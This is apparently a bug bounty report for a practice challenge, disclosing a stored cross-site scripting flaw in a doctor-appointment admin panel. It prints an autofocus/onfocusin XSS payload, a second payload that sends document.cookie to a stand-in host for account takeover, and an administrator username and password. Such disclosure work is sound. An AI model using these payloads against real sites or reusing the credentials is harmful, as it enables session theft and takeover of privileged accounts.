BugBountyHunter

Hi! I found another stored cross-site scripting issue but this time it's on /drpanel/drapi/query.php?aptid={ID}.

Update

The payload works on every browser, on Firefox it needs a tab change or a click. But on Chrome (Brave browser), it worked right away for me. No user interaction needed.

Steps to reproduce

• Visit /book-appointment.html and fill in the required details except the first name and last name fields. On these fields, paste in the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm%600%60">.

• Now, simply login using the administrator account by using the following credentials: drAdmin:s2Wpx5zfUvlSZhspJ.
• On the dashboard, inspect the last appointment and copy the ID.
• Navigate to /drpanel/drapi/query.php?aptid={ID}, xss should trigger.
• This is just a simple xss, we can go for account takeover by stealing cookies. Repeat the above steps, only on the first step, change the payload to the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="window.location.href='http://localhost/'%2bdocument.cookie">

• When we now visit /drpanel/drapi/query.php?aptid={ID}, we get redirected to http://localhost/${cookies}

This cookie can later be retrieved by the attacker and by that, fully compromise an administrator account.

Impact

Taking over an account with higher privileges is possible by stealing the cookies. This is because we could execute javascript on the administrator's behalf.

Background

I already had success with custom html tags, that gave me the idea to go for custom tags again. It also worked this time so it's probably a site-wide xss filter issue. Thanks for the fun and realistic challenge! I really like these!

Kind regards, 0xblackbird